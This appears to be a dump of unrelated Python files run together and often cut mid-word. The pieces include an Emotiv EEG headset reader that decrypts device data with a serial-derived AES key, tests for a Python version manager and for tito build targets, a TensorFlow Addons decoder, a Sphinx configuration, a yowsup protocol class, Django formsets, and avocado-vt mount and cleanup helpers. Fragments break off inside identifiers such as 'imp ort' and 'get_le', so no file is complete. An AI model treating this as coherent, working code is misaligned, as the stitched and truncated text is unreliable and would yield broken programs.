sub['by_channel_params']['channel_indexes'], ) self.streams.append(stream) def start(self): self.stop_flag = mp.Value('i', 0) #flag pultiproc = global self.process = mp.Process(target = emotiv_mainLoop, args=(self.stop_flag, self.streams, self.device) ) self.process.start() print 'FakeMultiAnalogChannel started:', self.name self.running = True def stop(self): self.stop_flag.value = 1 self.process.join() print 'FakeMultiAnalogChannel stopped:', self.name self.running = False def close(self): if WINDOWS: self.device['hid'].close() else: pass # for ii in self.streams: # self.streams[ii].stop() def setupCrypto(serial): type = 0 #feature[5] type &= 0xF type = 0 #I believe type == True is for the Dev headset, I'm not using that. That's the point of this library in the first place I thought. k = ['\0'] * 16 k[0] = serial[-1] k[1] = '\0' k[2] = serial[-2] if type: k[3] = 'H' k[4] = serial[-1] k[5] = '\0' k[6] = serial[-2] k[7] = 'T' k[8] = serial[-3] k[9] = '\x10' k[10] = serial[-4] k[11] = 'B' else: k[3] = 'T' k[4] = serial[-3] k[5] = '\x10' k[6] = serial[-4] k[7] = 'B' k[8] = serial[-1] k[9] = '\0' k[10] = serial[-2] k[11] = 'H' k[12] = serial[-3] k[13] = '\0' k[14] = serial[-4] k[15] = 'P' #It doesn't make sense to have more than one greenlet handling this as data needs to be in order anyhow. I guess you could assign an ID or something #to each packet but that seems like a waste also or is it? The ID might be useful if your using multiple headsets or usb sticks. key = ''.join(k) iv = Random.new().read(AES.block_size) cipher = AES.new(key, AES.MODE_ECB, iv) return cipher def get_level(data, bits): level = 0 for i in range(13, -1, -1): level <<= 1 b, o = (bits[i] / 8) + 1, bits[i] % 8 level |= (ord(data[b]) >> o) & 1 return level def emotiv_mainLoop(stop_flag, streams, device): import zmq abs_pos = pos = 0 #setup cryto cipher = setupCrypto(device['serial']) streamChan, streamImp, streamGyro = streams #Data channels socket context = zmq.Context() socket_chan = context.socket(zmq.PUB) socket_chan.bind("tcp://*:{}".format(streamChan['port'])) #Impedance channels socket socket_imp = context.socket(zmq.PUB) socket_imp.bind("tcp://*:{}".format(streamImp['port'])) #Gyro channels socket socket_gyro = context.socket(zmq.PUB) socket_gyro.bind("tcp://*:{}".format(streamGyro['port'])) packet_size = streamChan['packet_size'] sampling_rate = streamChan['sampling_rate'] np_arr_chan = streamChan['shared_array'].to_numpy_array() np_arr_imp = streamImp['shared_array'].to_numpy_array() np_arr_gyro = streamGyro['shared_array'].to_numpy_array() half_size = np_arr_chan.shape[1]/2 # same for the others impedance_qualities = { } for name in _channel_names + ['X', 'Y', 'Unknown']: impedance_qualities[name] = 0. if WINDOWS: device['hid'].open() device['hid'].set_raw_data_handler(emotiv_handler) else: hidraw = open(device['device_path']) while True: # READ DATA if WINDOWS: crypted_data = tasks.get(True) else: crypted_data = hidraw.read(32) # PROCESS data = cipher.decrypt(crypted_data[:16]) + cipher.decrypt(crypted_data[16:]) # current impedance quality sensor_num = ord(data[0]) num_to_name = { 0 : 'F3', 1:'FC5', 2 : 'AF3', 3 : 'F7', 4:'T7', 5 : 'P7', 6 : 'O1', 7 : 'O2', 8: 'P8', 9 : 'T8', 10: 'F8', 11 : 'AF4', 12 : 'FC6', 13: 'F4', 14 : 'F8', 15:'AF4', 64 : 'F3', 65 : 'FC5', 66 : 'AF3', 67 : 'F7', 68 : 'T7', 69 : 'P7', 70 : 'O1', 71 : 'O2', 72: 'P8', 73 : 'T8', 74: 'F8', 75 : 'AF4', 76 : 'FC6', 77: 'F4', 78 : 'F8', 79:'AF4', 80 : 'FC6', } if sensor_num in num_to_name: sensor_name = num_to_name[sensor_num] impedance_qualities[sensor_name] = get_le
import json import pathlib import re import pytest import snafu.versions version_paths = list(snafu.versions.VERSIONS_DIR_PATH.iterdir()) version_names = [p.stem for p in version_paths] @pytest.mark.parametrize('path', version_paths, ids=version_names) def test_version_definitions(path): assert path.suffix == '.json', '{} has wrong extension'.format(path) assert re.match(r'^\d\.\d(?:\-32)?$', path.stem), \ '{} has invalid name'.format(path) with path.open() as f: data = json.load(f) schema = data.pop('type') possible_types = snafu.versions.InstallerType.__members__ assert schema in possible_types assert isinstance(data.pop('version_info'), list) if schema == 'cpython_msi': for key in ('x86', 'amd64'): d = data.pop(key) assert d.pop('url') assert re.match(r'^[a-f\d]{32}$', d.pop('md5_sum')) elif schema == 'cpython': assert data.pop('url') assert re.match(r'^[a-f\d]{32}$', data.pop('md5_sum')) assert not data, 'superfulous keys: {}'.format(', '.join(data.keys())) def test_get_version_cpython_msi(): version = snafu.versions.get_version('3.4', force_32=False) assert version == snafu.versions.CPythonMSIVersion( name='3.4', url='https://www.python.org/ftp/python/3.4.4/python-3.4.4.amd64.msi', md5_sum='963f67116935447fad73e09cc561c713', version_info=(3, 4, 4), ) def test_get_version_cpython_msi_switch(): version = snafu.versions.get_version('3.4', force_32=True) assert version == snafu.versions.CPythonMSIVersion( name='3.4', url='https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi', md5_sum='e96268f7042d2a3d14f7e23b2535738b', version_info=(3, 4, 4), ) def test_get_version_cpython(): version = snafu.versions.get_version('3.5', force_32=False) assert version == snafu.versions.CPythonVersion( name='3.5', url='https://www.python.org/ftp/python/3.5.4/python-3.5.4-amd64.exe', md5_sum='4276742a4a75a8d07260f13fe956eec4', version_info=(3, 5, 4), ) def test_get_version_cpython_switch(): version = snafu.versions.get_version('3.5', force_32=True) assert version == snafu.versions.CPythonVersion( name='3.5-32', url='https://www.python.org/ftp/python/3.5.4/python-3.5.4.exe', md5_sum='9693575358f41f452d03fd33714f223f', version_info=(3, 5, 4), forced_32=True, ) def test_get_version_not_found(): with pytest.raises(snafu.versions.VersionNotFoundError) as ctx: snafu.versions.get_version('2.8', force_32=False) assert str(ctx.value) == '2.8' @pytest.mark.parametrize('name, force_32, result', [ ('3.6', False, 'Python 3.6'), ('3.6', True, 'Python 3.6-32'), ('3.4', False, 'Python 3.4'), ('3.4', True, 'Python 3.4'), ]) def test_str(name, force_32, result): version = snafu.versions.get_version(name, force_32=force_32) assert str(version) == result @pytest.mark.parametrize('name, force_32, cmd', [ ('3.6', False, 'python3.exe'), ('3.6', True, 'python3.exe'), ('2.7', False, 'python2.exe'), ('2.7', True, 'python2.exe'), ]) def test_python_major_command(mocker, name, force_32, cmd): mocker.patch.object(snafu.versions, 'configs', **{ 'get_scripts_dir_path.return_value': pathlib.Path(), }) version = snafu.versions.get_version(name, force_32=force_32) assert version.python_major_command == pathlib.Path(cmd) @pytest.mark.parametrize('name, force_32, result', [ ('3.6', False, '3.6'), ('3.6', True, '3.6'), ('3.4', False, '3.4'), ('3.4', True, '3.4'), ]) def test_arch_free_name(name, force_32, result): version = snafu.versions.get_version(name, force_32=force_32) assert version.arch_free_name == result @pytest.mark.parametrize('name, force_32, result', [ ('3.6', False, {'3.6'}), ('3.6', True, {'3.6', '3.6-32'}), ('3.6
-32', False, {'3.6-
32'}), ('3.4', False, {'3.4'}), ('3.4', True, {'3.4'}), ]) def test_script_version_names(name, force_32, result): version = snafu.versions.get_version(name, force_32=force_32) assert version.script_version_names == result def test_is_installed(tmpdir, mocker): mock_metadata = mocker.patch.object(snafu.versions, 'metadata', **{ 'get_install_path.return_value': pathlib.Path(str(tmpdir)), }) version = snafu.versions.get_version('3.6', force_32=False) assert version.is_installed() mock_metadata.get_install_path.assert_called_once_with('3.6')
imp
ort json from os.path import join, dirname from jsonschema import validate SCHEMA_FILE = "normandy-schema.json" def assert_valid_schema
(data): schema = _load_json_schema() return validate(data, schema) def _load_json_schema(): relative_path = join("schemas", SCHEMA_FILE) absolute_path = join(dirname(__file__), relative_path) with open(absolute_path) as schema_file: return json.loads(schema_file.read())
ce: - `inputs`: (structure of) Tensors and TensorArrays that is passed as input to the RNN cell composing the decoder, at each time step. - `state`: (structure of) Tensors and TensorArrays that is passed to the RNN cell instance as the state. - `memory`: tensor that is usually the full output of the encoder, which will be used for the attention wrapper for the RNN cell. - `finished`: boolean tensor telling whether each sequence in the batch is finished. - `training`: boolean whether it should behave in training mode or in inference mode. - `outputs`: instance of `tfa.seq2seq.BasicDecoderOutput`. Result of the decoding, at each time step. """ @typechecked def __init__( self, output_time_major: bool = False, impute_finished: bool = False, maximum_iterations: Optional[TensorLike] = None, parallel_iterations: int = 32, swap_memory: bool = False, **kwargs, ): self.output_time_major = output_time_major self.impute_finished = impute_finished self.maximum_iterations = maximum_iterations self.parallel_iterations = parallel_iterations self.swap_memory = swap_memory super().__init__(**kwargs) def call(self, inputs, initial_state=None, training=None, **kwargs): init_kwargs = kwargs init_kwargs["initial_state"] = initial_state return dynamic_decode( self, output_time_major=self.output_time_major, impute_finished=self.impute_finished, maximum_iterations=self.maximum_iterations, parallel_iterations=self.parallel_iterations, swap_memory=self.swap_memory, training=training, decoder_init_input=inputs, decoder_init_kwargs=init_kwargs, ) @property def batch_size(self): """The batch size of input values.""" raise NotImplementedError @property def output_size(self): """A (possibly nested tuple of...) integer[s] or `TensorShape` object[s].""" raise NotImplementedError @property def output_dtype(self): """A (possibly nested tuple of...) dtype[s].""" raise NotImplementedError def initialize(self, inputs, initial_state=None, **kwargs): """Called before any decoding iterations. This methods must compute initial input values and initial state. Args: inputs: (structure of) tensors that contains the input for the decoder. In the normal case, it's a tensor with shape [batch, timestep, embedding]. initial_state: (structure of) tensors that contains the initial state for the RNN cell. **kwargs: Other arguments that are passed in from layer.call() method. It could contains item like input `sequence_length`, or masking for input. Returns: `(finished, initial_inputs, initial_state)`: initial values of 'finished' flags, inputs and state. """ raise NotImplementedError def step(self, time, inputs, state, training): """Called per step of decoding (but only once for dynamic decoding). Args: time: Scalar `int32` tensor. Current step number. inputs: RNN cell input (possibly nested tuple of) tensor[s] for this time step. state: RNN cell state (possibly nested tuple of) tensor[s] from previous time step. training: Python boolean. Indicates whether the layer should behave in training mode or in inference mode. Returns: `(outputs, next_state, next_inputs, finished)`: `outputs` is an object containing the decoder output, `next_state` is a (structure of) state tensors a
nd TensorArrays, `next_inputs` is the tensor that should be used as input for the next step, `finished` is
a boolean tensor telling whether the sequence is complete, for each sequence in the batch. """ raise NotImplementedError def finalize(self, outputs, final_state, sequence_lengths): raise NotImplementedError @property def tracks_own_finished(self): """Describes whether the Decoder keeps track of finished states. Most decoders will emit a true/false `finished` value independently at each time step. In this case, the `tfa.seq2seq.dynamic_decode` function keeps track of which batch entries are already finished, and performs a logical OR to insert new batches to the finished set. Some decoders, however, shuffle batches / beams between time steps and `tfa.seq2seq.dynamic_decode` will mix up the finished state across these entries because it does not track the reshuffle across time steps. In this case, it is up to the decoder to declare that it will keep track of its own finished state by setting this property to `True`. Returns: Python bool. """ return False # TODO(scottzhu): Add build/get_config/from_config and other layer methods. @typechecked def dynamic_decode( decoder: Union[Decoder, BaseDecoder], output_time_major: bool = False, impute_finished: bool = False, maximum_iterations: Optional[TensorLike] = None, parallel_iterations: int = 32, swap_memory: bool = False, training: Optional[bool] = None, scope: Optional[str] = None, enable_tflite_convertible: bool = False, **kwargs, ) -> Tuple[Any, Any, Any]: """Runs dynamic decoding with a decoder. Calls `initialize()` once and `step()` repeatedly on the decoder object. Args: decoder: A `tfa.seq2seq.Decoder` or `tfa.seq2seq.BaseDecoder` instance. output_time_major: Python boolean. Default: `False` (batch major). If `True`, outputs are returned as time major tensors (this mode is faster). Otherwise, outputs are returned as batch major tensors (this adds extra time to the computation). impute_finished: Python boolean. If `True`, then states for batch entries which are marked as finished get copied through and the corresponding outputs get zeroed out. This causes some slowdown at each time step, but ensures that the final state and outputs have the correct values and that backprop ignores time steps that were marked as finished. maximum_iterations: A strictly positive `int32` scalar, the maximum allowed number of decoding steps. Default is `None` (decode until the decoder is fully done). parallel_iterations: Argument passed to `tf.while_loop`. swap_memory: Argument passed to `tf.while_loop`. training: Python boolean. Indicates whether the layer should behave in training mode or in inference mode. Only relevant when `dropout` or `recurrent_dropout` is used. scope: Optional name scope to use. enable_tflite_convertible: Python boolean. If `True`, then the variables of `TensorArray` become of 1-D static shape. Also zero pads in the output tensor will be discarded. Default: `False`. **kwargs: dict, other keyword arguments for dynamic_decode. It might contain arguments for `BaseDecoder` to initialize, which takes all tensor inputs during call(). Returns: `(final_outputs, final_state, final_sequence_lengths)`. Raises: ValueError: if `maximum_iterations` is provided but is not a scalar. """ with tf.name_scope(scope or "decoder"): is_xla = ( not tf.executing_eagerly() and control_flow_util.GraphOrParentsInXlaContext( tf.compat.v1.get_default_graph() ) ) if maximum_iterations is not None: maximum_iterations = tf.convert_to_tensor( maximum_iterations, dtype=tf.int32, name="maximum_iterations" ) if maximum_iterations.shape.ndims != 0: raise ValueError("maximum_iteratio
# author : Etienne THIERY from matgen import * import random import numpy def test_symmetricPositiveDefinite(): for i in range(10): print(".", end="", flush=True) size = random.randint(400, 500) maxVal = random.randint(0, 1000) M = symmetricPositiveDefinite(size, maxVal) if not (isSymmetric(M) and isDefinitePositive(M)): return False return True de
f test_symmetricSparsePositiveDefinite(): for i in range(10): print(".", end="", flush=True) size = random.randint(400, 500) maxVal = rand
om.randint(0, 1000) nbZeros = random.randint(0, size*(size-1)) M = symmetricSparsePositiveDefinite(size, nbZeros, maxVal) if not (isSymmetric(M) and isDefinitePositive(M) and abs(numberOfZeros(M)-nbZeros) <= 1): return False return True def numberOfZeros(M): count = 0 for line in M: for coeff in line: if coeff == 0: count+=1 return count def printTest(test_func): print("Testing " + test_func.__name__[5:] + " : ", end="", flush=True) print(("" if test_func() else "un") + "expected behaviour", flush=True) printTest(test_symmetricPositiveDefinite) printTest(test_symmetricSparsePositiveDefinite)
# -*- coding: utf-8 -*- # # HelixMC documentation build configuration file, created by # sphinx-quickstart on Thu Mar 21 15:51:36 2013. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. #import sys #import os import time # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) #sys.path.insert(0, os.path.abspath('sphinxext')) # -- General configuration --------------------------------------------------- # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary', 'sphinx.ext.mathjax', 'numpydoc' ] #Autodoc Stuffs autosummary_generate = True numpydoc_show_class_members = False def skip(app, what, name, obj, skip, options): if name == "__init__" or name == '__call__': return False return skip def setup(app): app.connect("autodoc-skip-member", skip) # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'HelixMC' copyright = u'2013-%s, Fang-Chieh Chou (GPLv3 Licence)' % time.strftime('%Y') # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. import helixmc version = helixmc.__version__ # The full version, including alpha/beta/rc tags. release = version # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_trees = ['_templates'] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. #pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. #html_theme = 'default' # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. html_logo = '_static/logo.png' # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. html_favicon = '_static/icon.ico' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'HelixMCdoc' # -- Options for LaTeX output ------------------------------------------------ latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, documentclass # [howto/manual]). latex_documents = [( 'index', 'HelixMC.tex', u'HelixMC Documentation', u'Fang-Chie
h Chou', 'manual' )] # The name of an image file (relative to this directory) to place at the top of # the title page. latex_logo = '_static/logo.png' # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as
an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output ------------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ('index', 'helixmc', u'HelixMC Documentation', [u'Fang-Chieh Chou'], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ----------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [( 'index', 'HelixMC', u'HelixMC Documentation', u'Fang-Chieh Chou', 'HelixMC', 'One line description of project.', 'Miscellaneous' )] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' trim_doctests_flags = True
from syzoj.mo
dels import JudgeState from syzoj import db db.create_all() all_judge = JudgeState.query.all() for item in all_judge: item.update_usera
c_info()
import subprocess as Subprocess import pymel.all as pm class CapsDisabler(object): def __init__(self, parentRef, go=False): self.parentRef = parentRef self.ini = self.parentRef.ini sel
f.conf = self.ini.conf self.enabled = False
self.autohotkeyProcess = None if go==True: self.go() def go(self): try: if int( self.ini.getItem("disable_capslock") ) == 1: self.enabled = True else: #print("Hotkeys not enabled.") pass except: print("\n Could not start CapsLock disabling system or could " "not find info on it's configuration, perhaps because of " "missing info in the ini file. \n") if self.enabled: self.disableCapslock() def killAutohotkeyProcess(self): if isinstance( self.autohotkeyProcess, Subprocess.Popen ): try: self.autohotkeyProcess.kill() except: u.log( "Autohotkey process not stopped. Perhaps it had " "not been started.") self.autohotkeyProcess = None else: self.autohotkeyProcess = None def disableCapslock(self): self.killAutohotkeyProcess() self.autohotkeyProcess = None self.autohotkeyProcess = Subprocess.Popen( self.parentRef.env.conf.autohotkey_command ) def startDisablingCapslock(self): self.disableCapslock() def stopDisablingCapslock(self): self.killAutohotkeyProcess() def setDisableCaplockOn(self): print( "pretending to set disable_capslock to ON" ) #self.ini.setItem( disable_capslock, 1 ) ##untested code pass def setDisableCapslockOff(self): print( "pretending to set disable_capslock to OFF" ) #self.ini.setItem( disable_capslock, 0 ) pass
from yowsup.structs import ProtocolEntity, ProtocolTreeNode class IqProtocolEntity(ProtocolEntity): ''' <iq type="{{get | set}}" id="{{id}}" xmlns="{{xmlns}}" to="{{TO}}" from="{{FROM}}"> </iq> ''' TYPE_SET = "set" TYPE_GET = "get" TYPE_ERROR = "error" TYPE_RESULT = "result" TYPE_DELETE = "delete" TYPES = (TYPE_SET, TYPE_GET, TYPE_RESULT, TYPE_ERROR, TYPE_DELETE) def __init__(self, xmlns = None, _id = None, _type = None, to = None, _from = None): super(IqProtocolEntity, self).__init__("iq") assert _type in self.__class__.TYPES, "Iq of type %s is not implemented, can accept only (%s)" % (_type," | ".join(self.__class__.TYPES)) assert not to or not _from, "Can't set from and to at the same time" self._id = self._generateId(True) if _id is None else _id self._from = _from self._type = _type self.xmlns = xmlns self.to = to def getId(self): return self._id def getType(self): return self._type def getXmlns(self): return self.xmlns def getFrom(self, full = True): return self._from if
full else self._from.split('@')[0] def getTo(self): return self.to def toProtocolTreeNode(self): attribs = { "id" : self._id, "type" : self._type
} if self.xmlns: attribs["xmlns"] = self.xmlns if self.to: attribs["to"] = self.to elif self._from: attribs["from"] = self._from return self._createProtocolTreeNode(attribs, None, data = None) def __str__(self): out = "Iq:\n" out += "ID: %s\n" % self._id out += "Type: %s\n" % self._type if self.xmlns: out += "xmlns: %s\n" % self.xmlns if self.to: out += "to: %s\n" % self.to elif self._from: out += "from: %s\n" % self._from return out @staticmethod def fromProtocolTreeNode(node): return IqProtocolEntity( node.getAttributeValue("xmlns"), node.getAttributeValue("id"), node.getAttributeValue("type"), node.getAttributeValue("to"), node.getAttributeValue("from") )
import unittest from tito.buildparser import BuildTargetParser from ConfigParser import ConfigParser from tito.exception import TitoException class BuildTargetParserTests(unittest.TestCase): def setUp(self): unittest.TestCase.setUp(self) self.valid_branches = ["branch1", "branch2"] self.release_target = "project-x.y.z" self.releasers_config = ConfigParser() self.releasers_config.add_section(self.release_target) self.releasers_config.set(self.release_target, "build_targets", "branch1:project-x.y.z-candidate") def test_parser_gets_correct_targets(self): parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) release_targets = parser.get_build_targets() self.assertTrue("branch1" in release_targets) self.assertEqual("project-x.y.z-candidate", release_targets["branch1"]) self.assertFalse("branch2" in release_targets) def test_invalid_branch_raises_exception(self): self.releasers_config.set(self.release_target, "build_targets",
"invalid-branch:project-x.y.z-candidate") parser = BuildTargetParser(self.releasers_config, self.rele
ase_target, self.valid_branches) self.assertRaises(TitoException, parser.get_build_targets) def test_missing_semicolon_raises_exception(self): self.releasers_config.set(self.release_target, "build_targets", "invalid-branchproject-x.y.z-candidate") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) self.assertRaises(TitoException, parser.get_build_targets) def test_empty_branch_raises_exception(self): self.releasers_config.set(self.release_target, "build_targets", ":project-x.y.z-candidate") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) self.assertRaises(TitoException, parser.get_build_targets) def test_empty_target_raises_exception(self): self.releasers_config.set(self.release_target, "build_targets", "branch1:") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) self.assertRaises(TitoException, parser.get_build_targets) def test_multiple_spaces_ok(self): self.releasers_config.set(self.release_target, "build_targets", " branch1:project-x.y.z-candidate ") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) release_targets = parser.get_build_targets() self.assertEqual(1, len(release_targets)) self.assertTrue("branch1" in release_targets) self.assertEqual("project-x.y.z-candidate", release_targets["branch1"]) def test_multiple_branches_supported(self): self.releasers_config.set(self.release_target, "build_targets", "branch1:project-x.y.z-candidate branch2:second-target") parser = BuildTargetParser(self.releasers_config, self.release_target, self.valid_branches) release_targets = parser.get_build_targets() self.assertEquals(2, len(release_targets)) self.assertTrue("branch1" in release_targets) self.assertEqual("project-x.y.z-candidate", release_targets["branch1"]) self.assertTrue("branch2" in release_targets) self.assertEqual("second-target", release_targets['branch2'])
from django.forms.formsets import BaseFormSet, formset_factory from django.forms.models import BaseModelFormSet from django.forms.models import modelformset_factory from django import forms from models import PlanillaHistoricas, ConceptosFolios, Folios, Tomos class PlanillaHistoricasForm(forms.Form): codi_empl_per = forms.CharField(max_length=50, widget=forms.TextInput(attrs={'class': 'nombre', 'placeholder': 'Apellidos y Nombres'})) desc_plan_stp = forms.CharField(max_length=200, widget=forms.Textarea(attrs={'rows': 1})) def __init__(self, concepto, *args, **kwargs): super(PlanillaHistoricasForm, self).__init__(*args, **kwargs) campos = dict() egr = 'border-color: #e9322d; -webkit-box-shadow: 0 0 6px #f8b9b7; -moz-box-shadow: 0 0 6px #f8b9b7; box-shadow: 0 0 6px #f8b9b7;'; ing = 'border-color: #2D78E9; -webkit-box-shadow: 0 0 6px #2D78E9; -moz-box-shadow: 0 0 6px #2D78E9; box-shadow: 0 0 6px #2D78E9;'; total = 'border-color: rgb(70, 136, 71); -webkit-box-shadow: 0 0 6px rgb(70, 136, 71); -moz-box-shadow: 0 0 6px rgb(70, 136, 71); box-shadow: 0 0 6px rgb(70, 136, 71);'; for conc in concepto: codigo = conc.codi_conc_tco.codi_conc_tco descripcion = conc.codi_conc_tco.desc_cort_tco tipo = conc.codi_conc_tco.tipo_conc_tco clase = 'remuneraciones' if codigo == 'C373' else 'descuentos' if codigo == 'C374' else 'total' if codigo == 'C12' else 'monto' attrs = { 'class': clase + ' error', 'data-title': descripcion, 'data-tipo': tipo, 'style': 'width:auto;font-size:15px;' + (ing if tipo == '1' else egr if tipo == '2' else total if codigo in ('C373', 'C12', 'C374') else ''), 'maxlength': 35, 'placeholder': descripcion } if codigo in campos: campos[codigo] += 1 else:
campos[codigo] = 1 index = campos[codigo] flag = '_%s' % index self.fields['%s%s' % (codigo, flag)] = forms.CharField(widget=forms.TextInput(attrs=attrs)) self.fields['codigos'] = forms.Ch
arField(max_length=700, widget=forms.HiddenInput()) class BasePlanillaHistoricasFormSet(BaseFormSet): def __init__(self, *args, **kwargs): self.concepto = kwargs['concepto'] del kwargs['concepto'] super(BasePlanillaHistoricasFormSet, self).__init__(*args, **kwargs) def _construct_form(self, i, **kwargs): kwargs['concepto'] = self.concepto return super(BasePlanillaHistoricasFormSet, self)._construct_form(i, **kwargs) def add_fields(self, form, index): super(BasePlanillaHistoricasFormSet, self).add_fields(form, index) PlanillaHistoricasFormSet = formset_factory(#form=PlanillaHistoricasForm, form=PlanillaHistoricasForm, formset=BasePlanillaHistoricasFormSet, extra=0, can_delete=False) #exclude=('id', ))
t in mount_result.splitlines(): if mount_str in result: if options: options = options.split(",") options_result = result.split()[3].split(",") for op in options: if op not in options_result: if verbose: logging.info("%s is not mounted with given" " option %s", src, op) return False if verbose: logging.info("%s is mounted", src) return True if verbose: logging.info("%s is not mounted", src) return False def mount(src, dst, fstype=None, opti
ons=None, verbose=False, session=None): """ Mount src under dst if
it's really mounted, then remout with options. :param src: source device or directory :param dst: mountpoint :param fstype: filesystem type need to mount :param options: mount options :param session: mount within the session if given :return: if mounted return True else return False """ options = (options and [options] or [''])[0] if is_mount(src, dst, fstype, options, verbose, session): if 'remount' not in options: options = 'remount,%s' % options cmd = ['mount'] if fstype: cmd.extend(['-t', fstype]) if options: cmd.extend(['-o', options]) cmd.extend([src, dst]) cmd = ' '.join(cmd) if session: return session.cmd_status(cmd, safe=True) == 0 return process.system(cmd, verbose=verbose) == 0 def umount(src, dst, fstype=None, verbose=False, session=None): """ Umount src from dst, if src really mounted under dst. :param src: source device or directory :param dst: mountpoint :param fstype: fstype used to check if mounted as expected :param session: umount within the session if given :return: if unmounted return True else return False """ mounted = is_mount(src, dst, fstype, verbose=verbose, session=session) if mounted: from . import utils_package package = "psmisc" # check package is available, if not try installing it if not utils_package.package_install(package): logging.error("%s is not available/installed for fuser", package) fuser_cmd = "fuser -km %s" % dst umount_cmd = "umount %s" % dst if session: session.cmd_output_safe(fuser_cmd) return session.cmd_status(umount_cmd, safe=True) == 0 process.system(fuser_cmd, ignore_status=True, verbose=True, shell=True) return process.system(umount_cmd, ignore_status=True, verbose=True) == 0 return True @error_context.context_aware def cleanup(folder): """ If folder is a mountpoint, do what is possible to unmount it. Afterwards, try to remove it. :param folder: Directory to be cleaned up. """ error_context.context( "cleaning up unattended install directory %s" % folder) umount(None, folder) if os.path.isdir(folder): shutil.rmtree(folder) @error_context.context_aware def clean_old_image(image): """ Clean a leftover image file from previous processes. If it contains a mounted file system, do the proper cleanup procedures. :param image: Path to image to be cleaned up. """ error_context.context("cleaning up old leftover image %s" % image) if os.path.exists(image): umount(image, None) os.remove(image) class Disk(object): """ Abstract class for Disk objects, with the common methods implemented. """ def __init__(self): self.path = None def get_answer_file_path(self, filename): return os.path.join(self.mount, filename) def copy_to(self, src): logging.debug("Copying %s to disk image mount", src) dst = os.path.join(self.mount, os.path.basename(src)) if os.path.isdir(src): shutil.copytree(src, dst) elif os.path.isfile(src): shutil.copyfile(src, dst) def close(self): os.chmod(self.path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH) cleanup(self.mount) logging.debug("Disk %s successfully set", self.path) class FloppyDisk(Disk): """ Represents a floppy disk. We can copy files to it, and setup it in convenient ways. """ @error_context.context_aware def __init__(self, path, qemu_img_binary, tmpdir, vfd_size): error_context.context( "Creating unattended install floppy image %s" % path) self.mount = tempfile.mkdtemp(prefix='floppy_virttest_', dir=tmpdir) self.path = path self.vfd_size = 